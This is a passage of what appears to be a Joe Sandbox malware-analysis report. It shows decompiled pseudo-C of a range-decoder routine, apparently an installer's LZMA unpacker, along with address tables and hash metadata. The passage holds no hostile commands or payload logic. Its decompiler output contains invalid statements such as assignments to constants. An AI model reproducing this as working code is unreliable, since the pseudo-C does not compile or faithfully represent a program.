                      								__eax = (__eflags >= 0) - 1 + 0xa;
                      								_v60 = (__eflags >= 0) - 1 + 0xa;
                      								__eax = _v8;
                      								__eax = _v8 + 0x664;
                      								__eflags = __eax;
                      								_v92 = __eax;
                      								goto L71;
                      							}
                      							__eax = _v8;
                      							__ecx = _v60;
                      							_v136 = 8;
                      							__esi = _v8 + 0x198 + _v60 * 2;
                      							goto L135;
                      						case 8:
                      							__eflags = _v68;
                      							if(_v68 != 0) {
                      								__eax = _v8;
                      								__ecx = _v60;
                      								_v136 = 0xa;
                      								__esi = _v8 + 0x1b0 + _v60 * 2;
                      							} else {
                      								__eax = _v60;
                      								__ecx = _v8;
                      								__eax = _v60 + 0xf;
                      								_v136 = 9;
                      								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                      								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                      							}
                      							goto L135;
                      						case 9:
                      							__eflags = _v68;
                      							if(_v68 != 0) {
                      								goto L92;
                      							}
                      							__eflags = _v100;
                      							if(_v100 == 0) {
                      								goto L174;
                      							}
                      							__eax = 0;
                      							__eflags = _v60 - 7;
                      							_t264 = _v60 - 7 >= 0;
                      							__eflags = _t264;
                      							0 | _t264 = _t264 + _t264 + 9;
                      							_v60 = _t264 + _t264 + 9;
                      							goto L78;
                      						case 0xa:
                      							__eflags = _v68;
                      							if(_v68 != 0) {
                      								__eax = _v8;
                      								__ecx = _v60;
                      								_v136 = 0xb;
                      								__esi = _v8 + 0x1c8 + _v60 * 2;
                      								goto L135;
                      							}
                      							__eax = _v44;
                      							goto L91;
                      						case 0xb:
                      							__eflags = _v68;
                      							if(_v68 != 0) {
                      								__ecx = _v40;
                      								__eax = _v36;
                      								_v36 = _v40;
                      							} else {
                      								__eax = _v40;
                      							}
                      							__ecx = _v44;
                      							_v40 = _v44;
                      							L91:
                      							__ecx = _v48;
                      							_v48 = __eax;
                      							_v44 = _v48;
                      							L92:
                      							__eax = _v8;
                      							_v132 = 0x15;
                      							__eax = _v8 + 0xa68;
                      							_v92 = _v8 + 0xa68;
                      							goto L71;
                      						case 0xc:
                      							L102:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 0xc;
                      								goto L173;
                      							}
                      							__ecx = _v116;
                      							__eax = _v16;
                      							_v20 = _v20 << 8;
                      							__ecx =  *_v116 & 0x000000ff;
                      							_v112 = _v112 - 1;
                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							_t340 =  &_v116;
                      							 *_t340 = _v116 + 1;
                      							__eflags =  *_t340;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							__eax = _v48;
                      							goto L104;
                      						case 0xd:
                      							L39:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 0xd;
                      								goto L173;
                      							}
                      							__ecx = _v116;
                      							__eax = _v16;
                      							_v20 = _v20 << 8;
                      							__ecx =  *_v116 & 0x000000ff;
                      							_v112 = _v112 - 1;
                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							_t127 =  &_v116;
                      							 *_t127 = _v116 + 1;
                      							__eflags =  *_t127;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							L41:
                      							__eax = _v68;
                      							__eflags = _v76 - _v68;
                      							if(_v76 != _v68) {
                      								goto L50;
                      							}
                      							__eflags = __ebx - 0x100;
                      							if(__ebx >= 0x100) {
                      								goto L56;
                      							}
                      							L43:
                      							__eax = _v95 & 0x000000ff;
                      							_v95 = _v95 << 1;
                      							__ecx = _v92;
                      							__eax = (_v95 & 0x000000ff) >> 7;
                      							_v76 = __eax;
                      							__eax = __eax + 1;
                      							__eax = __eax << 8;
                      							__eax = __eax + __ebx;
                      							__esi = _v92 + __eax * 2;
                      							_v20 = _v20 >> 0xb;
                      							__ax =  *__esi;
                      							_v88 = __esi;
                      							__edx = __ax & 0x0000ffff;
                      							__ecx = (_v20 >> 0xb) * __edx;
                      							__eflags = _v16 - __ecx;
                      							if(_v16 >= __ecx) {
                      								_v20 = _v20 - __ecx;
                      								_v16 = _v16 - __ecx;
                      								__cx = __ax;
                      								_v68 = 1;
                      								__cx = __ax >> 5;
                      								__eflags = __eax;
                      								__ebx = __ebx + __ebx + 1;
                      								 *__esi = __ax;
                      							} else {
                      								_v68 = _v68 & 0x00000000;
                      								_v20 = __ecx;
                      								0x800 = 0x800 - __edx;
                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      								__ebx = __ebx + __ebx;
                      								 *__esi = __cx;
                      							}
                      							__eflags = _v20 - 0x1000000;
                      							_v72 = __ebx;
                      							if(_v20 >= 0x1000000) {
                      								goto L41;
                      							} else {
                      								goto L39;
                      							}
                      						case 0xe:
                      							L48:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 0xe;
                      								goto L173;
                      							}
                      							__ecx = _v116;
                      							__eax = _v16;
                      							_v20 = _v20 << 8;
                      							__ecx =  *_v116 & 0x000000ff;
                      							_v112 = _v112 - 1;
                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							_t161 =  &_v116;
                      							 *_t161 = _v116 + 1;
                      							__eflags =  *_t161;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							while(1) {
                      								L50:
                      								__eflags = __ebx - 0x100;
                      								if(__ebx >= 0x100) {
                      									break;
                      								}
                      								__eax = _v92;
                      								__edx = __ebx + __ebx;
                      								__ecx = _v20;
                      								__esi = __edx + __eax;
                      								__ecx = _v20 >> 0xb;
                      								__ax =  *__esi;
                      								_v88 = __esi;
                      								__edi = __ax & 0x0000ffff;
                      								__ecx = (_v20 >> 0xb) * __edi;
                      								__eflags = _v16 - __ecx;
                      								if(_v16 >= __ecx) {
                      									_v20 = _v20 - __ecx;
                      									_v16 = _v16 - __ecx;
                      									__cx = __ax;
                      									_t175 = __edx + 1; // 0x1
                      									__ebx = _t175;
                      									__cx = __ax >> 5;
                      									__eflags = __eax;
                      									 *__esi = __ax;
                      								} else {
                      									_v20 = __ecx;
                      									0x800 = 0x800 - __edi;
                      									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      									__ebx = __ebx + __ebx;
                      									 *__esi = __cx;
                      								}
                      								__eflags = _v20 - 0x1000000;
                      								_v72 = __ebx;
                      								if(_v20 >= 0x1000000) {
                      									continue;
                      								} else {
                      									goto L48;
                      								}
                      							}
                      							L56:
                      							_t178 =  &_v56;
                      							 *_t178 = _v56 & 0x00000000;
                      							__eflags =  *_t178;
                      							goto L57;
                      						case 0xf:
                      							L60:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 0xf;
                      								goto L173;
                      							}
                      							__ecx = _v116;
                      							__eax = _v16;
                      							_v20 = _v20 << 8;
                      							__ecx =  *_v116 & 0x000000ff;
                      							_v112 = _v112 - 1;
                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							_t208 =  &_v116;
                      							 *_t208 = _v116 + 1;
                      							__eflags =  *_t208;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							L62:
                      							__eflags = __ebx - 0x100;
                      							if(__ebx >= 0x100) {
                      								L57:
                      								__al = _v72;
                      								_v96 = _v72;
                      								goto L58;
                      							}
                      							L63:
                      							__eax = _v92;
                      							__edx = __ebx + __ebx;
                      							__ecx = _v20;
                      							__esi = __edx + __eax;
                      							__ecx = _v20 >> 0xb;
                      							__ax =  *__esi;
                      							_v88 = __esi;
                      							__edi = __ax & 0x0000ffff;
                      							__ecx = (_v20 >> 0xb) * __edi;
                      							__eflags = _v16 - __ecx;
                      							if(_v16 >= __ecx) {
                      								_v20 = _v20 - __ecx;
                      								_v16 = _v16 - __ecx;
                      								__cx = __ax;
                      								_t222 = __edx + 1; // 0x1
                      								__ebx = _t222;
                      								__cx = __ax >> 5;
                      								__eflags = __eax;
                      								 *__esi = __ax;
                      							} else {
                      								_v20 = __ecx;
                      								0x800 = 0x800 - __edi;
                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      								__ebx = __ebx + __ebx;
                      								 *__esi = __cx;
                      							}
                      							__eflags = _v20 - 0x1000000;
                      							_v72 = __ebx;
                      							if(_v20 >= 0x1000000) {
                      								goto L62;
                      							} else {
                      								goto L60;
                      							}
                      						case 0x10:
                      							L112:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 0x10;
                      								goto L173;
                      							}
                      							__ecx = _v116;
                      							__eax = _v16;
                      							_v20 = _v20 << 8;
                      							__ecx =  *_v116 & 0x000000ff;
                      							_v112 = _v112 - 1;
                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							_t371 =  &_v116;
                      							 *_t371 = _v116 + 1;
                      							__eflags =  *_t371;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							goto L114;
                      						case 0x11:
                      							L71:
                      							__esi = _v92;
                      							_v136 = 0x12;
                      							goto L135;
                      						case 0x12:
                      							__eflags = _v68;
                      							if(_v68 != 0) {
                      								__eax = _v92;
                      								_v136 = 0x13;
                      								__esi = _v92 + 2;
                      								L135:
                      								_v88 = _t626;
                      								goto L136;
                      							}
                      							__eax = _v80;
                      							_v52 = _v52 & 0x00000000;
                      							__ecx = _v92;
                      							__eax = _v80 << 4;
                      							__eflags = __eax;
                      							__eax = _v92 + __eax + 4;
                      							goto L133;
                      						case 0x13:
                      							__eflags = _v68;
                      							if(_v68 != 0) {
                      								_t475 =  &_v92;
                      								 *_t475 = _v92 + 0x204;
                      								__eflags =  *_t475;
                      								_v52 = 0x10;
                      								_v68 = 8;
                      								L147:
                      								_v128 = 0x14;
                      								goto L148;
                      							}
                      							__eax = _v80;
                      							__ecx = _v92;
                      							__eax = _v80 << 4;
                      							_v52 = 8;
                      							__eax = _v92 + (_v80 << 4) + 0x104;
                      							L133:
                      							_v92 = __eax;
                      							_v68 = 3;
                      							goto L147;
                      						case 0x14:
                      							_v52 = _v52 + __ebx;
                      							__eax = _v132;
                      							goto L143;
                      						case 0x15:
                      							__eax = 0;
                      							__eflags = _v60 - 7;
                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      							__al = __al & 0x000000fd;
                      							__eax = (__eflags >= 0) - 1 + 0xb;
                      							_v60 = (__eflags >= 0) - 1 + 0xb;
                      							goto L123;
                      						case 0x16:
                      							__eax = _v52;
                      							__eflags = __eax - 4;
                      							if(__eax >= 4) {
                      								_push(3);
                      								_pop(__eax);
                      							}
                      							__ecx = _v8;
                      							_v68 = 6;
                      							__eax = __eax << 7;
                      							_v128 = 0x19;
                      							_v92 = __eax;
                      							goto L148;
                      						case 0x17:
                      							L148:
                      							__eax = _v68;
                      							_v84 = 1;
                      							_v76 = _v68;
                      							goto L152;
                      						case 0x18:
                      							L149:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 0x18;
                      								goto L173;
                      							}
                      							__ecx = _v116;
                      							__eax = _v16;
                      							_v20 = _v20 << 8;
                      							__ecx =  *_v116 & 0x000000ff;
                      							_v112 = _v112 - 1;
                      							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							_t490 =  &_v116;
                      							 *_t490 = _v116 + 1;
                      							__eflags =  *_t490;
                      							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                      							L151:
                      							_t493 =  &_v76;
                      							 *_t493 = _v76 - 1;
                      							__eflags =  *_t493;
                      							L152:
                      							__eflags = _v76;
                      							if(_v76 <= 0) {
                      								__ecx = _v68;
                      								__ebx = _v84;
                      								0 = 1;
                      								__eax = 1 << __cl;
                      								__ebx = _v84 - (1 << __cl);
                      								__eax = _v128;
                      								_v72 = __ebx;
                      								L143:
                      								_v140 = _t561;
                      								goto L3;
                      							}
                      							__eax = _v84;
                      							_v20 = _v20 >> 0xb;
                      							__edx = _v84 + _v84;
                      							__eax = _v92;
                      							__esi = __edx + __eax;
                      							_v88 = __esi;
                      							__ax =  *__esi;
                      							__edi = __ax & 0x0000ffff;
                      							__ecx = (_v20 >> 0xb) * __edi;
                      							__eflags = _v16 - __ecx;
                      							if(_v16 >= __ecx) {
                      								_v20 = _v20 - __ecx;
                      								_v16 = _v16 - __ecx;
                      								__cx = __ax;
                      								__cx = __ax >> 5;
                      								__eax = __eax - __ecx;
                      								__edx = __edx + 1;
                      								__eflags = __edx;
                      								 *__esi = __ax;
                      								_v84 = __edx;
                      							} else {
                      								_v20 = __ecx;
                      								0x800 = 0x800 - __edi;
                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      								_v84 = _v84 << 1;
                      								 *__esi = __cx;
                      							}
                      							__eflags = _v20 - 0x1000000;
                      							if(_v20 >= 0x1000000) {
                      								goto L151;
                      							} else {
                      								goto L149;
                      							}
                      						case 0x19:
                      							__eflags = __ebx - 4;
                      							if(__ebx < 4) {
                      								_v48 = __ebx;
                      								L122:
                      								_t399 =  &_v48;
                      								 *_t399 = _v48 + 1;
                      								__eflags =  *_t399;
                      								L123:
                      								__eax = _v48;
                      								__eflags = __eax;
                      								if(__eax == 0) {
                      									_v52 = _v52 | 0xffffffff;
                      									goto L173;
                      								}
                      								__eflags = __eax - _v100;
                      								if(__eax > _v100) {
                      									goto L174;
                      								}
                      								_v52 = _v52 + 2;
                      								__eax = _v52;
                      								_t406 =  &_v100;
                      								 *_t406 = _v100 + _v52;
                      								__eflags =  *_t406;
                      								goto L126;
                      							}
                      							__ecx = __ebx;
                      							__eax = __ebx;
                      							__ecx = __ebx >> 1;
                      							__eax = __ebx & 0x00000001;
                      							__ecx = (__ebx >> 1) - 1;
                      							__al = __al | 0x00000002;
                      							__eax = (__ebx & 0x00000001) << __cl;
                      							__eflags = __ebx - 0xe;
                      							_v48 = __eax;
                      							if(__ebx >= 0xe) {
                      								__ebx = 0;
                      								_v76 = __ecx;
                      								L105:
                      								__eflags = _v76;
                      								if(_v76 <= 0) {
                      									__eax = __eax + __ebx;
                      									_v68 = 4;
                      									_v48 = __eax;
                      									__eax = _v8;
                      									__eax = _v8 + 0x644;
                      									__eflags = __eax;
                      									L111:
                      									__ebx = 0;
                      									_v92 = __eax;
                      									_v84 = 1;
                      									_v72 = 0;
                      									_v76 = 0;
                      									L115:
                      									__eax = _v68;
                      									__eflags = _v76 - _v68;
                      									if(_v76 >= _v68) {
                      										_t397 =  &_v48;
                      										 *_t397 = _v48 + __ebx;
                      										__eflags =  *_t397;
                      										goto L122;
                      									}
                      									__eax = _v84;
                      									_v20 = _v20 >> 0xb;
                      									__edi = _v84 + _v84;
                      									__eax = _v92;
                      									__esi = __edi + __eax;
                      									_v88 = __esi;
                      									__ax =  *__esi;
                      									__ecx = __ax & 0x0000ffff;
                      									__edx = (_v20 >> 0xb) * __ecx;
                      									__eflags = _v16 - __edx;
                      									if(_v16 >= __edx) {
                      										__ecx = 0;
                      										_v20 = _v20 - __edx;
                      										__ecx = 1;
                      										_v16 = _v16 - __edx;
                      										__ebx = 1;
                      										__ecx = _v76;
                      										__ebx = 1 << __cl;
                      										__ecx = 1 << __cl;
                      										__ebx = _v72;
                      										__ebx = _v72 | __ecx;
                      										__cx = __ax;
                      										__cx = __ax >> 5;
                      										__eax = __eax - __ecx;
                      										__edi = __edi + 1;
                      										__eflags = __edi;
                      										_v72 = __ebx;
                      										 *__esi = __ax;
                      										_v84 = __edi;
                      									} else {
                      										_v20 = __edx;
                      										0x800 = 0x800 - __ecx;
                      										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                      										_v84 = _v84 << 1;
                      										 *__esi = __dx;
                      									}
                      									__eflags = _v20 - 0x1000000;
                      									if(_v20 >= 0x1000000) {
                      										L114:
                      										_t374 =  &_v76;
                      										 *_t374 = _v76 + 1;
                      										__eflags =  *_t374;
                      										goto L115;
                      									} else {
                      										goto L112;
                      									}
                      								}
                      								__ecx = _v16;
                      								__ebx = __ebx + __ebx;
                      								_v20 = _v20 >> 1;
                      								__eflags = _v16 - _v20;
                      								_v72 = __ebx;
                      								if(_v16 >= _v20) {
                      									__ecx = _v20;
                      									_v16 = _v16 - _v20;
                      									__ebx = __ebx | 0x00000001;
                      									__eflags = __ebx;
                      									_v72 = __ebx;
                      								}
                      								__eflags = _v20 - 0x1000000;
                      								if(_v20 >= 0x1000000) {
                      									L104:
                      									_t344 =  &_v76;
                      									 *_t344 = _v76 - 1;
                      									__eflags =  *_t344;
                      									goto L105;
                      								} else {
                      									goto L102;
                      								}
                      							}
                      							__edx = _v8;
                      							__eax = __eax - __ebx;
                      							_v68 = __ecx;
                      							__eax = _v8 + 0x55e + __eax * 2;
                      							goto L111;
                      						case 0x1a:
                      							L58:
                      							__eflags = _v104;
                      							if(_v104 == 0) {
                      								_v140 = 0x1a;
                      								goto L173;
                      							}
                      							__ecx = _v108;
                      							__al = _v96;
                      							__edx = _v12;
                      							_v100 = _v100 + 1;
                      							_v108 = _v108 + 1;
                      							_v104 = _v104 - 1;
                      							 *_v108 = __al;
                      							__ecx = _v24;
                      							 *(_v12 + __ecx) = __al;
                      							__eax = __ecx + 1;
                      							__edx = 0;
                      							_t197 = __eax % _v120;
                      							__eax = __eax / _v120;
                      							__edx = _t197;
                      							goto L82;
                      						case 0x1b:
                      							L78:
                      							__eflags = _v104;
                      							if(_v104 == 0) {
                      								_v140 = 0x1b;
                      								goto L173;
                      							}
                      							__eax = _v24;
                      							__eax = _v24 - _v48;
                      							__eflags = __eax - _v120;
                      							if(__eax >= _v120) {
                      								__eax = __eax + _v120;
                      								__eflags = __eax;
                      							}
                      							__edx = _v12;
                      							__cl =  *(__edx + __eax);
                      							__eax = _v24;
                      							_v96 = __cl;
                      							 *(__edx + __eax) = __cl;
                      							__eax = __eax + 1;
                      							__edx = 0;
                      							_t280 = __eax % _v120;
                      							__eax = __eax / _v120;
                      							__edx = _t280;
                      							__eax = _v108;
                      							_v100 = _v100 + 1;
                      							_v108 = _v108 + 1;
                      							_t289 =  &_v104;
                      							 *_t289 = _v104 - 1;
                      							__eflags =  *_t289;
                      							 *_v108 = __cl;
                      							L82:
                      							_v24 = __edx;
                      							goto L83;
                      						case 0x1c:
                      							while(1) {
                      								L126:
                      								__eflags = _v104;
                      								if(_v104 == 0) {
                      									break;
                      								}
                      								__eax = _v24;
                      								__eax = _v24 - _v48;
                      								__eflags = __eax - _v120;
                      								if(__eax >= _v120) {
                      									__eax = __eax + _v120;
                      									__eflags = __eax;
                      								}
                      								__edx = _v12;
                      								__cl =  *(__edx + __eax);
                      								__eax = _v24;
                      								_v96 = __cl;
                      								 *(__edx + __eax) = __cl;
                      								__eax = __eax + 1;
                      								__edx = 0;
                      								_t420 = __eax % _v120;
                      								__eax = __eax / _v120;
                      								__edx = _t420;
                      								__eax = _v108;
                      								_v108 = _v108 + 1;
                      								_v104 = _v104 - 1;
                      								_v52 = _v52 - 1;
                      								__eflags = _v52;
                      								 *_v108 = __cl;
                      								_v24 = _t420;
                      								if(_v52 > 0) {
                      									continue;
                      								} else {
                      									L83:
                      									_v140 = 2;
                      									goto L3;
                      								}
                      							}
                      							_v140 = 0x1c;
                      							L173:
                      							_push(0x22);
                      							_pop(_t574);
                      							memcpy(_v148,  &_v140, _t574 << 2);
                      							return 0;
                      					}
                      				}
                      				L174:
                      				_t538 = _t537 | 0xffffffff;
                      				return _t538;
                      			}










































                      0x00406604
                      0x004065c6
                      0x004065c6
                      0x004065ce
                      0x004065d3
                      0x004065d5
                      0x004065d8
                      0x004065d8
                      0x00406607
                      0x0040660e
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00406598
                      0x00000000
                      0x00406610
                      0x00000000
                      0x00406610
                      0x0040660e
                      0x00406521
                      0x00406524
                      0x00406526
                      0x00406529
                      0x0040652c
                      0x0040652f
                      0x00406531
                      0x00406534
                      0x00406537
                      0x00406537
                      0x0040653a
                      0x0040653a
                      0x0040653d
                      0x00406544
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00406518
                      0x00000000
                      0x00406546
                      0x00000000
                      0x00406546
                      0x00406544
                      0x004064ca
                      0x004064cd
                      0x004064cf
                      0x004064d2
                      0x00000000
                      0x00000000
                      0x00406231
                      0x00406231
                      0x00406235
                      0x0040687a
                      0x00000000
                      0x0040687a
                      0x0040623b
                      0x0040623e
                      0x00406241
                      0x00406244
                      0x00406247
                      0x0040624a
                      0x0040624d
                      0x0040624f
                      0x00406252
                      0x00406255
                      0x00406258
                      0x0040625a
                      0x0040625a
                      0x0040625a
                      0x00000000
                      0x00000000
                      0x004063bc
                      0x004063bc
                      0x004063c0
                      0x00406886
                      0x00000000
                      0x00406886
                      0x004063c6
                      0x004063c9
                      0x004063cc
                      0x004063cf
                      0x004063d1
                      0x004063d1
                      0x004063d1
                      0x004063d4
                      0x004063d7
                      0x004063da
                      0x004063dd
                      0x004063e0
                      0x004063e3
                      0x004063e4
                      0x004063e6
                      0x004063e6
                      0x004063e6
                      0x004063e9
                      0x004063ec
                      0x004063ef
                      0x004063f2
                      0x004063f2
                      0x004063f2
                      0x004063f5
                      0x004063f7
                      0x004063f7
                      0x00000000
                      0x00000000
                      0x00406639
                      0x00406639
                      0x00406639
                      0x0040663d
                      0x00000000
                      0x00000000
                      0x00406643
                      0x00406646
                      0x00406649
                      0x0040664c
                      0x0040664e
                      0x0040664e
                      0x0040664e
                      0x00406651
                      0x00406654
                      0x00406657
                      0x0040665a
                      0x0040665d
                      0x00406660
                      0x00406661
                      0x00406663
                      0x00406663
                      0x00406663
                      0x00406666
                      0x00406669
                      0x0040666c
                      0x0040666f
                      0x00406672
                      0x00406676
                      0x00406678
                      0x0040667b
                      0x00000000
                      0x0040667d
                      0x004063fa
                      0x004063fa
                      0x00000000
                      0x004063fa
                      0x0040667b
                      0x004068b0
                      0x004068d2
                      0x004068d8
                      0x004068da
                      0x004068e1
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x004068e7
                      0x004068e7
                      0x00000000

                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                      • Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
                      • Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                      • Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E004062EB() {
                      				signed int _t539;
                      				unsigned short _t540;
                      				signed int _t541;
                      				void _t542;
                      				signed int _t543;
                      				signed int _t544;
                      				signed int _t573;
                      				signed int _t576;
                      				signed int _t597;
                      				signed int* _t614;
                      				void* _t621;
                      
                      				L0:
                      				while(1) {
                      					L0:
                      					if( *(_t621 - 0x40) != 1) {
                      						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                      						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                      						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                      						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                      						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                      						_t539 =  *(_t621 - 4) + 0x664;
                      						 *(_t621 - 0x58) = _t539;
                      						goto L68;
                      					} else {
                      						 *(__ebp - 0x84) = 8;
                      						while(1) {
                      							L132:
                      							 *(_t621 - 0x54) = _t614;
                      							while(1) {
                      								L133:
                      								_t540 =  *_t614;
                      								_t597 = _t540 & 0x0000ffff;
                      								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                      								if( *(_t621 - 0xc) >= _t573) {
                      									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                      									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                      									 *(_t621 - 0x40) = 1;
                      									_t541 = _t540 - (_t540 >> 5);
                      									 *_t614 = _t541;
                      								} else {
                      									 *(_t621 - 0x10) = _t573;
                      									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                      									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                      								}
                      								if( *(_t621 - 0x10) >= 0x1000000) {
                      									goto L139;
                      								}
                      								L137:
                      								if( *(_t621 - 0x6c) == 0) {
                      									 *(_t621 - 0x88) = 5;
                      									L170:
                      									_t576 = 0x22;
                      									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                      									_t544 = 0;
                      									L172:
                      									return _t544;
                      								}
                      								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                      								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                      								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                      								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                      								L139:
                      								_t542 =  *(_t621 - 0x84);
                      								while(1) {
                      									 *(_t621 - 0x88) = _t542;
                      									while(1) {
                      										L1:
                      										_t543 =  *(_t621 - 0x88);
                      										if(_t543 > 0x1c) {
                      											break;
                      										}
                      										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
                      											case 0:
                      												if( *(_t621 - 0x6c) == 0) {
                      													goto L170;
                      												}
                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                      												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                      												_t543 =  *( *(_t621 - 0x70));
                      												if(_t543 > 0xe1) {
                      													goto L171;
                      												}
                      												_t547 = _t543 & 0x000000ff;
                      												_push(0x2d);
                      												asm("cdq");
                      												_pop(_t578);
                      												_push(9);
                      												_pop(_t579);
                      												_t617 = _t547 / _t578;
                      												_t549 = _t547 % _t578 & 0x000000ff;
                      												asm("cdq");
                      												_t612 = _t549 % _t579 & 0x000000ff;
                      												 *(_t621 - 0x3c) = _t612;
                      												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                      												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                      												_t620 = (0x300 << _t612 + _t617) + 0x736;
                      												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                      													L10:
                      													if(_t620 == 0) {
                      														L12:
                      														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                      														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                      														goto L15;
                      													} else {
                      														goto L11;
                      													}
                      													do {
                      														L11:
                      														_t620 = _t620 - 1;
                      														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                      													} while (_t620 != 0);
                      													goto L12;
                      												}
                      												if( *(_t621 - 4) != 0) {
                      													GlobalFree( *(_t621 - 4));
                      												}
                      												_t543 = GlobalAlloc(0x40, 0x600); // executed
                      												 *(_t621 - 4) = _t543;
                      												if(_t543 == 0) {
                      													goto L171;
                      												} else {
                      													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                      													goto L10;
                      												}
                      											case 1:
                      												L13:
                      												__eflags =  *(_t621 - 0x6c);
                      												if( *(_t621 - 0x6c) == 0) {
                      													 *(_t621 - 0x88) = 1;
                      													goto L170;
                      												}
                      												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                      												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                      												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                      												_t45 = _t621 - 0x48;
                      												 *_t45 =  *(_t621 - 0x48) + 1;
                      												__eflags =  *_t45;
                      												L15:
                      												if( *(_t621 - 0x48) < 4) {
                      													goto L13;
                      												}
                      												_t555 =  *(_t621 - 0x40);
                      												if(_t555 ==  *(_t621 - 0x74)) {
                      													L20:
                      													 *(_t621 - 0x48) = 5;
                      													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                      													goto L23;
                      												}
                      												 *(_t621 - 0x74) = _t555;
                      												if( *(_t621 - 8) != 0) {
                      													GlobalFree( *(_t621 - 8));
                      												}
                      												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                      												 *(_t621 - 8) = _t543;
                      												if(_t543 == 0) {
                      													goto L171;
                      												} else {
                      													goto L20;
                      												}
                      											case 2:
                      												L24:
                      												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                      												 *(_t621 - 0x84) = 6;
                      												 *(_t621 - 0x4c) = _t562;
                      												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                      												goto L132;
